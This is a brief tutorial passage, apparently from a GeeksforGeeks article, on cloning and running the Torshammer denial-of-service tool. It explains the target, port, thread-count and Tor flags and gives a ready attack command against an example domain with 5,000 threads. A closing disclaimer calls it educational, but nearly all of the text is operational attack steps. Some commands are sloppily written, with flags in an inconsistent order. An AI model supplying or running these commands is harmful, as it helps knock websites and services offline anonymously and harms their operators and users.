$ git clone https://github.com/king1615/torshammer
$ cd torshammer
[Write this command-
$ python torshammer.py
It will finally open the main interface for the tool.
-t is for the target, some domain or ip-address. -p is for port Defaults to 80. -r is for the threads, how many threads we want to run for this attack. -T stands for tor customized attacks. Let’s do the main thing:
$ python torshammer.py <i>any hostname/IP</i> -t -p 80 -r 5000
For example-
$ python torshammer.py -t xyz.com -p 80 -r 5000
As you hit enter after writing those commands, something will appear
Disclaimer: This article is just for knowledge purpose. Please don’t use this article to perform any malicious activity. Remember, before targeting or attacking anyone’s IP/hostname/Servers one must have the necessary permissions CRIDATE geeksforgeeks.org